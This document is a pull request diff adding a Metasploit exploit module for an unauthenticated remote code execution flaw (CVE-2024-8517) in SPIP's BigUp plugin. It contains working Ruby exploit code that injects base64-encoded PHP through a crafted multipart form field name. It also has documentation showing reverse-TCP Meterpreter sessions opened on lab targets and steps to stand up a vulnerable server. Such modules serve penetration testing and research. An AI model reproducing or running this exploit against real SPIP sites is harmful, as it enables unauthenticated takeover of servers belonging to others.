### PR TITLE
Add SPIP BigUp Plugin Unauthenticated RCE (CVE-2024-8517)

### DIFF
--- a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -69,10 +69,7 @@ This option is particularly useful when the default pages (`login` and `contact`
 **Steps**:
 
 1. Start `msfconsole`.
-2. Load the module:
-```bash
-use exploit/multi/http/spip_bigup_unauth_rce
-```
+2. Load the module via `use exploit/multi/http/spip_bigup_unauth_rce`
 3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
 4. Configure other necessary options (`TARGETURI`, `SSL`, etc.).
 5. Launch the exploit:

--- a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -1,0 +1,129 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in SPIP
+versions up to and including 4.3.1, specifically in the BigUp plugin.
+The vulnerability occurs due to improper handling of file uploads in the
+`lister_fichiers_par_champs` function, which can be exploited by crafting a malicious multipart form request.
+This allows an attacker to inject and execute arbitrary PHP code on the server.
+
+### Non-Docker Setup
+
+To replicate a vulnerable environment for testing, follow these steps:
+
+1. Download and set up SPIP version 4.3.1.
+2. Use the built-in PHP server to host the SPIP instance.
+
+#### Commands to Set Up the Vulnerable Environment:
+
+```bash
+wget https://files.spip.net/spip/archives/spip-v4.3.1.zip
+mkdir spip && mv spip-v4.3.1.zip spip
+cd spip && unzip spip-v4.3.1.zip
+php -S 0.0.0.0:8000
+```
+
+- **SPIP Access URL:** `http://localhost:8000`
+- **SPIP Version:** 4.3.1
+
+After starting the PHP server, SPIP will be accessible at `http://localhost:8000`.
+
+To complete the installation:
+
+1. Navigate to `http://localhost:8000/ecrire` to access the SPIP web installation panel.
+2. Follow the on-screen instructions to complete the setup.
+
+## Verification Steps
+
+1. Set up a SPIP instance using the commands provided above.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/spip_bigup_unauth_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+- **FORM_PAGE**: This option allows you to specify a custom page on the target SPIP installation that contains a form.
+By default, the module will automatically check the `login` and `contact` pages for forms,
+but if you know of another page that contains a form, you can specify it here.
+For example, if an article page contains a form, you can set this option like so:
+
+```
+set FORM_PAGE /spip.php?article1
+```
+
+This will instruct the module to look for the form data on `/spip.php?article1`.
+If the specified page contains the vulnerable form, the module will proceed with the exploitation.
+This option is particularly useful when the default pages (`login` and `contact`) do not contain the form or are not accessible.
+
+## Scenarios
+
+### Successful Exploitation Against Local SPIP 4.3.1
+
+**Setup**:
+
+- Local SPIP instance with version 4.3.1.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```bash
+use exploit/multi/http/spip_bigup_unauth_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
+4. Configure other necessary options (`TARGETURI`, `SSL`, etc.).
+5. Launch the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`:
+
+```bash
+msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.3.1
+[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
+[*] Preparing to send exploit payload to the target...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:46322) at 2024-09-03 20:08:36 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```bash
+msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.3.1
+[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
+[*] Preparing to send exploit payload to the target...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:58062) at 2024-09-03 20:09:20 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-119-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
+
+**Note**: Ensure the SPIP instance is correctly configured and running using the manual setup for the exploit to work as expected.

--- a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -60,7 +60,7 @@ docker run --name casse-spip -p 8000:80 \
 ## Options
 
 - **FORM_PAGE**: This option allows you to specify a custom page on the target SPIP installation that contains a form.
-By default, the module will automatically check the `login` and `contact` pages for forms,
+By default, the module will automatically check the `login`, `spip_pass`, and `contact` pages for forms,
 but if you know of another page that contains a form, you can specify it here.
 For example, if an article page contains a form, you can set this option like so:
 
@@ -70,7 +70,8 @@ set FORM_PAGE /spip.php?article1
 
 This will instruct the module to look for the form data on `/spip.php?article1`.
 If the specified page contains the vulnerable form, the module will proceed with the exploitation.
-This option is particularly useful when the default pages (`login` and `contact`) do not contain the form or are not accessible.
+This option is particularly useful when the default pages (`login`, `spip_pass` and `contact`)
+do not contain the form or are not accessible.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -41,15 +41,11 @@ To replicate a vulnerable environment for testing, follow these steps:
 ```bash
 docker run --name casse-spip -p 8000:80 \
     -e SPIP_DB_SERVER=sqlite3 \
-    -e SPIP_SITE_ADDRESS=http://127.0.0.1 \
+    -e SPIP_SITE_ADDRESS=http://localhost \
     -d ipeos/spip:4.3.1
 ```
 
 2. Go to `http://localhost:8000` to access the SPIP application.
-
-It is recommended to use the Docker installation because the non-Docker version automatically
-retrieves the latest plugin updates, making the exploit ineffective.
-The Docker version ensures a vulnerable environment.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -32,6 +32,25 @@ To complete the installation:
 1. Navigate to `http://localhost:8000/ecrire` to access the SPIP web installation panel.
 2. Follow the on-screen instructions to complete the setup.
 
+### Docker Setup
+
+To replicate a vulnerable environment for testing, follow these steps:
+
+1. Pull the vulnerable SPIP Docker image:
+
+```bash
+docker run --name casse-spip -p 8000:80 \
+    -e SPIP_DB_SERVER=sqlite3 \
+    -e SPIP_SITE_ADDRESS=http://127.0.0.1 \
+    -d ipeos/spip:4.3.1
+```
+
+2. Go to `http://localhost:8000` to access the SPIP application.
+
+It is recommended to use the Docker installation because the non-Docker version automatically
+retrieves the latest plugin updates, making the exploit ineffective.
+The Docker version ensures a vulnerable environment.
+
 ## Verification Steps
 
 1. Set up a SPIP instance using the commands provided above.
@@ -87,16 +106,19 @@ msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] SPIP Version detected: 4.3.1
-[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
+[+] SPIP version 4.3.1 is vulnerable.
+[*] Bigup plugin version detected: 3.2.11
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
+[*] Found formulaire_action: login
+[*] Found formulaire_action_args: yt4d8ri/avF6LO/OwLA2O...
 [*] Preparing to send exploit payload to the target...
-[*] Sending stage (39927 bytes) to 192.168.1.36
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:46322) at 2024-09-03 20:08:36 +0200
+[*] Sending stage (39927 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.17.0.2:54956) at 2024-09-08 05:53:39 +0200
 
 meterpreter > sysinfo 
-Computer    : linux
-OS          : Linux linux 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
+Computer    : d6c6866cac5a
+OS          : Linux d6c6866cac5a 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
 Meterpreter : php/linux
-meterpreter > 
 ```
 
 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
@@ -107,18 +129,21 @@ msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] SPIP Version detected: 4.3.1
-[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
+[+] SPIP version 4.3.1 is vulnerable.
+[*] Bigup plugin version detected: 3.2.11
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
+[*] Found formulaire_action: login
+[*] Found formulaire_action_args: yt4d8ri/avF6LO/OwLA2O...
 [*] Preparing to send exploit payload to the target...
-[*] Sending stage (3045380 bytes) to 192.168.1.36
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:58062) at 2024-09-03 20:09:20 +0200
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.17.0.2:55956) at 2024-09-08 05:54:43 +0200
 
 meterpreter > sysinfo 
-Computer     : 192.168.1.36
-OS           : LinuxMint 21.3 (Linux 5.15.0-119-generic)
+Computer     : 172.17.0.2
+OS           : Debian 11.10 (Linux 5.15.0-119-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > 
 ```
 
 - The module successfully exploits the vulnerability and opens a Meterpreter session on the target.

--- a/lib/msf/core/exploit/remote/http/spip.rb
+++ b/lib/msf/core/exploit/remote/http/spip.rb
@@ -47,48 +47,23 @@ module Msf
     # @param [String] plugin_name Name of the plugin to search for
     # @return [Rex::Version, nil] Version of the plugin as Rex::Version, or nil if not found
     def spip_plugin_version(plugin_name)
-      res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'spip.php')
-      )
-
+      res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'spip.php'))
       return unless res
 
-      # Check the Composed-By header for plugin version or config.txt URL
       composed_by = res.headers['Composed-By']
-      return unless composed_by
+      # Case 1: Check if 'Composed-By' header is present and not empty
+      return parse_plugin_version(composed_by, plugin_name) if composed_by && !composed_by.empty?
 
-      # Case 1: Look for config.txt URL in the header
-      if composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
-        config_url = ::Regexp.last_match(1)
-        vprint_status("Found config.txt URL: #{config_url}")
+      composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
+      config_url = ::Regexp.last_match(1)
+      config_url ||= normalize_uri(target_uri.path, 'local', 'config.txt')
 
-        # Fetch and parse the config.txt file directly
-        config_res = send_request_cgi(
-          'method' => 'GET',
-          'uri' => config_url
-        )
+      # Case 2: Send a request to fetch the config.txt file
+      config_res = send_request_cgi('method' => 'GET', 'uri' => config_url)
+      return unless config_res&.code == 200
 
-        if config_res&.code == 200
-          return parse_plugin_version(config_res.body, plugin_name)
-        end
-      end
-
-      # Case 2: Check for plugin version directly in Composed-By
-      plugin_version = parse_plugin_version(composed_by, plugin_name)
-      return plugin_version if plugin_version
-
-      # Case 3: Fallback to fetching /local/config.txt directly
-      vprint_status('No version found in Composed-By header. Attempting to fetch /local/config.txt directly.')
-      config_url = normalize_uri(target_uri.path, 'local', 'config.txt')
-      config_res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => config_url
-      )
-
-      return parse_plugin_version(config_res.body, plugin_name) if config_res&.code == 200
-
-      nil
+      # Case 3: Parse the content of config.txt to find the plugin version
+      parse_plugin_version(config_res.body, plugin_name)
     end
 
     # Parse the plugin version from config.txt or composed-by

--- a/lib/msf/core/exploit/remote/http/spip.rb
+++ b/lib/msf/core/exploit/remote/http/spip.rb
@@ -52,7 +52,7 @@ module Msf
 
       composed_by = res.headers['Composed-By']
       # Case 1: Check if 'Composed-By' header is present and not empty
-      return parse_plugin_version(composed_by, plugin_name) if composed_by && !composed_by.empty?
+      return parse_plugin_version(composed_by, plugin_name) if composed_by&.present?
 
       composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
       config_url = ::Regexp.last_match(1)

--- a/lib/msf/core/exploit/remote/http/spip.rb
+++ b/lib/msf/core/exploit/remote/http/spip.rb
@@ -75,11 +75,8 @@ module Msf
       end
 
       # Case 2: Check for plugin version directly in Composed-By
-      composed_by.split(',').each do |entry|
-        if entry =~ /#{plugin_name}\((\d+(\.\d+)+)\)/
-          return Rex::Version.new(::Regexp.last_match(1))
-        end
-      end
+      plugin_version = parse_plugin_version(composed_by, plugin_name)
+      return plugin_version if plugin_version
 
       # Case 3: Fallback to fetching /local/config.txt directly
       vprint_status('No version found in Composed-By header. Attempting to fetch /local/config.txt directly.')

--- a/lib/msf/core/exploit/remote/http/spip.rb
+++ b/lib/msf/core/exploit/remote/http/spip.rb
@@ -1,46 +1,111 @@
 # -*- coding: binary -*-
 
 module Msf
-module Exploit::Remote::HTTP::Spip
+  module Exploit::Remote::HTTP::Spip
+    include Msf::Exploit::Remote::HttpClient
 
-  include Msf::Exploit::Remote::HttpClient
+    def initialize(info = {})
+      super
 
-  def initialize(info = {})
-    super
+      register_options([
+        OptString.new('TARGETURI', [true, 'Path to Spip install', '/'])
+      ])
+    end
 
-    register_options([
-      OptString.new('TARGETURI', [true, 'Path to Spip install', '/'])
-    ])
+    # Determine Spip version
+    #
+    # @return [Rex::Version] Version as Rex::Version
+    def spip_version
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'spip.php')
+      )
+
+      return unless res
+
+      version = nil
+
+      potential_sources = [
+        res.get_html_document.at('head/meta[@name="generator"]/@content')&.text,
+        res.headers['Composed-By']
+      ]
+
+      potential_sources.each do |text|
+        next unless text
+
+        if text =~ /SPIP\s(\d+(\.\d+)+)/
+          version = ::Regexp.last_match(1)
+          break
+        end
+      end
+
+      return version ? Rex::Version.new(version) : nil
+    end
+
+    # Determine Spip plugin version by name
+    #
+    # @param [String] plugin_name Name of the plugin to search for
+    # @return [Rex::Version, nil] Version of the plugin as Rex::Version, or nil if not found
+    def spip_plugin_version(plugin_name)
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'spip.php')
+      )
+
+      return unless res
+
+      # Check the Composed-By header for plugin version or config.txt URL
+      composed_by = res.headers['Composed-By']
+      return unless composed_by
+
+      # Case 1: Look for config.txt URL in the header
+      if composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
+        config_url = ::Regexp.last_match(1)
+        vprint_status("Found config.txt URL: #{config_url}")
+
+        # Fetch and parse the config.txt file directly
+        config_res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => config_url
+        )
+
+        if config_res&.code == 200
+          return parse_plugin_version(config_res.body, plugin_name)
+        end
+      end
+
+      # Case 2: Check for plugin version directly in Composed-By
+      composed_by.split(',').each do |entry|
+        if entry =~ /#{plugin_name}\((\d+(\.\d+)+)\)/
+          return Rex::Version.new(::Regexp.last_match(1))
+        end
+      end
+
+      # Case 3: Fallback to fetching /local/config.txt directly
+      vprint_status('No version found in Composed-By header. Attempting to fetch /local/config.txt directly.')
+      config_url = normalize_uri(target_uri.path, 'local', 'config.txt')
+      config_res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => config_url
+      )
+
+      return parse_plugin_version(config_res.body, plugin_name) if config_res&.code == 200
+
+      nil
+    end
+
+    # Parse the plugin version from config.txt or composed-by
+    #
+    # @param [String] body The body content to parse
+    # @param [String] plugin_name Name of the plugin to find the version for
+    # @return [Rex::Version, nil] Version of the plugin as Rex::Version, or nil if not found
+    def parse_plugin_version(body, plugin_name)
+      body.each_line do |line|
+        if line =~ /#{plugin_name}\((\d+(\.\d+)+)\)/
+          return Rex::Version.new(::Regexp.last_match(1))
+        end
+      end
+      nil
+    end
   end
-
-  # Determine Spip version
-  #
-  # @return [Rex::Version] Version as Rex::Version
-  def spip_version
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, "spip.php")
-    )
-
-    return unless res
-
-    version = nil
-
-    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
-    if version_string =~ /SPIP (.*)/
-      version = ::Regexp.last_match(1)
-    end
-
-    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*)/
-      version = ::Regexp.last_match(1)
-    end
-
-    if version.nil?
-      return nil
-    end
-
-    return Rex::Version.new(version)
-  end
-
-end
 end

--- a/lib/msf/core/exploit/remote/http/spip.rb
+++ b/lib/msf/core/exploit/remote/http/spip.rb
@@ -52,18 +52,15 @@ module Msf
 
       composed_by = res.headers['Composed-By']
       # Case 1: Check if 'Composed-By' header is present and not empty
-      return parse_plugin_version(composed_by, plugin_name) if composed_by&.present?
+      version = composed_by&.present? ? parse_plugin_version(composed_by, plugin_name) : nil
+      return version if version
 
-      composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i
-      config_url = ::Regexp.last_match(1)
-      config_url ||= normalize_uri(target_uri.path, 'local', 'config.txt')
-
-      # Case 2: Send a request to fetch the config.txt file
+      # Case 2: Extract URL from 'Composed-By' header and send a request to fetch the config.txt file
+      config_url = composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i ? ::Regexp.last_match(1) : normalize_uri(target_uri.path, 'local', 'config.txt')
       config_res = send_request_cgi('method' => 'GET', 'uri' => config_url)
-      return unless config_res&.code == 200
+      return parse_plugin_version(config_res.body, plugin_name) if config_res&.code == 200
 
-      # Case 3: Parse the content of config.txt to find the plugin version
-      parse_plugin_version(config_res.body, plugin_name)
+      nil
     end
 
     # Parse the plugin version from config.txt or composed-by

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2024-8517'],
+          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/'],
           ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']
         ],
         'Platform' => %w[php unix linux win],

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.
           The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered
-          when the `bigup_retrouver_fichiers` parameter is set to `1`. By exploiting the improper
+          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper
           handling of multipart form data in file uploads, an attacker can inject and execute
           arbitrary PHP code on the target server.
 
@@ -29,17 +29,18 @@ class MetasploitModule < Msf::Exploit::Remote
           4.3.2, 4.2.16, and 4.1.18.
         },
         'Author' => [
-          'Vozec', # Vulnerability Discoverer
-          'Laluka', # Vulnerability Discoverer
-          'Julien Voisin', # Code Review
+          'Vozec',            # Vulnerability Discovery
+          'Laluka',           # Vulnerability Discovery
+          'Julien Voisin',    # Code Review
           'Valentin Lobstein' # Metasploit Module
         ],
         'License' => MSF_LICENSE,
         'References' => [
+          ['CVE', '2024-8517'],
           ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']
         ],
         'Platform' => %w[php unix linux win],
-        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Arch' => %w[ARCH_PHP ARCH_CMD],
         'Targets' => [
           [
             'PHP In-Memory', {
@@ -103,19 +104,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless plugin_version
       print_warning('Could not determine the version of the bigup plugin.')
-      return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
+      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
     end
 
-    return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
+    return CheckCode::Appears("The detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.") if plugin_version < Rex::Version.new('3.1.6')
 
     CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
   end
 
+  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.
+  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).
+  # We need to check multiple pages because the configuration of SPIP can vary.
   def get_form_data
     pages = []
 
     form_page = datastore['FORM_PAGE']
-    pages << form_page if form_page && form_page.downcase != 'auto'
+    pages << form_page if form_page&.downcase != 'auto'
 
     pages.concat(%w[login spip_pass contact]) if pages.empty?
 
@@ -132,48 +136,61 @@ class MetasploitModule < Msf::Exploit::Remote
       next unless action && args
 
       print_status("Found formulaire_action: #{action}")
-      print_status("Found formulaire_action_args: #{args}")
+      print_status("Found formulaire_action_args: #{args[0..20]}...")
       return { action: action, args: args }
     end
 
     nil
   end
+end
 
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = "$#{vars[:dis]}"
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    <<-END_OF_PHP_CODE
+# This function generates PHP code to execute a given payload on the target.
+# We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
+# The payload is encoded in base64 to prevent issues with special characters.
+# The generated PHP code includes the necessary preamble and system block to execute the payload.
+# This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
+def php_exec_cmd(encoded_payload)
+  vars = Rex::RandomIdentifier::Generator.new
+  dis = "$#{vars[:dis]}"
+  encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+  <<-END_OF_PHP_CODE
             #{php_preamble(disabled_varname: dis)}
             $c = base64_decode("#{encoded_clean_payload}");
             #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
+  END_OF_PHP_CODE
+end
+
+def exploit
+  form_data = get_form_data
+
+  unless form_data
+    fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
   end
 
-  def exploit
-    form_data = get_form_data
+  print_status('Preparing to send exploit payload to the target...')
 
-    unless form_data
-      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')
-    end
+  phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+  b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
 
-    print_status('Preparing to send exploit payload to the target...')
+  post_data = Rex::MIME::Message.new
 
-    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')
+  # This line is necessary for the form to be valid, works in tandem with formulaire_action_args
+  post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
 
-    post_data = Rex::MIME::Message.new
+  # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability
+  post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
 
-    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')
-    post_data.add_part('1', nil, nil, 'form-data; name="bigup_retrouver_fichiers"')
-    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
-    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+  # Injection is performed here. The die() function is used to avoid leaving traces in the logs,
+  # prevent errors, and stop the execution of PHP after the injection.
+  post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")
 
-    send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'spip.php'),
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'data' => post_data.to_s
-    }, 1)
-  end
+  # This is necessary for the form to be accepted
+  post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')
+
+  send_request_cgi({
+    'method' => 'POST',
+    'uri' => normalize_uri(target_uri.path, 'spip.php'),
+    'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+    'data' => post_data.to_s
+  }, 1)
 end

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -102,13 +102,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_good("SPIP version #{rversion} is vulnerable.")
     plugin_version = spip_plugin_version('bigup')
-    print_status("Bigup plugin version detected: #{plugin_version}")
 
     unless plugin_version
       print_warning('Could not determine the version of the bigup plugin.')
       return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
     end
 
+    print_status("Bigup plugin version detected: #{plugin_version}")
     if plugin_version < Rex::Version.new('3.2.12')
       return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")
     end

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -1,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Payload::Php
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Spip
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SPIP BigUp Plugin Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.
+          The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered
+          when the `bigup_retrouver_fichiers` parameter is set to `1`. By exploiting the improper
+          handling of multipart form data in file uploads, an attacker can inject and execute
+          arbitrary PHP code on the target server.
+
+          This critical vulnerability affects all versions of SPIP from 4.0 up to and including
+          4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code
+          remotely via the public interface. The vulnerability has been patched in versions
+          4.3.2, 4.2.16, and 4.1.18.
+        },
+        'Author' => [
+          'Vozec', # Vulnerability Discoverer
+          'Laluka', # Vulnerability Discoverer
+          'Julien Voisin', # Code Review
+          'Valentin Lobstein' # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']
+        ],
+        'Platform' => %w[php unix linux win],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2024-09-01',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('FORM_PAGE', ['false', 'A page with a form.', 'Auto'])
+      ]
+    )
+  end
+
+  def check
+    rversion = spip_version
+    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
+
+    print_status("SPIP Version detected: #{rversion}")
+
+    vulnerable_ranges = [
+      { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },
+      { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },
+      { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }
+    ]
+
+    vulnerable_ranges.each do |range|
+      if rversion.between?(range[:start], range[:end])
